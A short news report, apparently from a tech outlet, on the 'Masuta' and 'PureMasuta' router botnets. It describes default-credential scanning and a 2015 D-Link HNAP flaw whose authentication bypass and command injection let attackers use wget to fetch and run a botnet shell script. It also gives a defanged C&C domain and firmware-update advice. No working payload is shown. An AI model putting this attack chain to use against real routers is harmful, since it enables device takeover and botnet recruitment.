Fresh botnet recruiting routers with weak credentials
With a special HNAP exploit just for D-Link kit
Security researchers believe the author of the Satori botnet is at it again, this time attacking routers to craft a botnet dubbed "Masuta".
The early-January Satori botnet attacked a Huawei router zero-day. Masuta also hits routers.
According to NewSky's analysis, the attack comes in two flavours. There's Masuta, which takes the standard IoT approach of tapping devices for default credentials (hidden by a single XOR by
0x22, inspired by Mirai); and there's the more sophisticated “PureMasuta” which exploits an old network administration bug.
That bug was spotted back in 2015, when Craig Heffner identified a bug in D-Link's Home Network Administration Protocol. That's what Pure Masuta tries to exploit.
It is possible to craft a SOAP query which can bypass authentication by using hxxp://purenetworks.com/HNAP1/GetDeviceSettings. Also, it is feasible to run system commands (leading to arbitrary code execution) because of improper string handling. When both issues are combined, one can form a SOAP request which first bypasses authentication, and then causes arbitrary code execution.
Since the bug lets routers run anything after GetDeviceSettings, what PureMasuta's bot-herders do is run a
wget to fetch and run a shell script, recruiting the device into its botnet.
If you have a vulnerable device – D-Link's AC300, for example – make sure you've got firmware newer than 2015.
NewSky's attribution of the botnet, to an entity they dub "Nexus Zeta", comes from the C&C URL
nexusiotsolutions(dot)net, since this was the same URL as the Satori botnet used. ®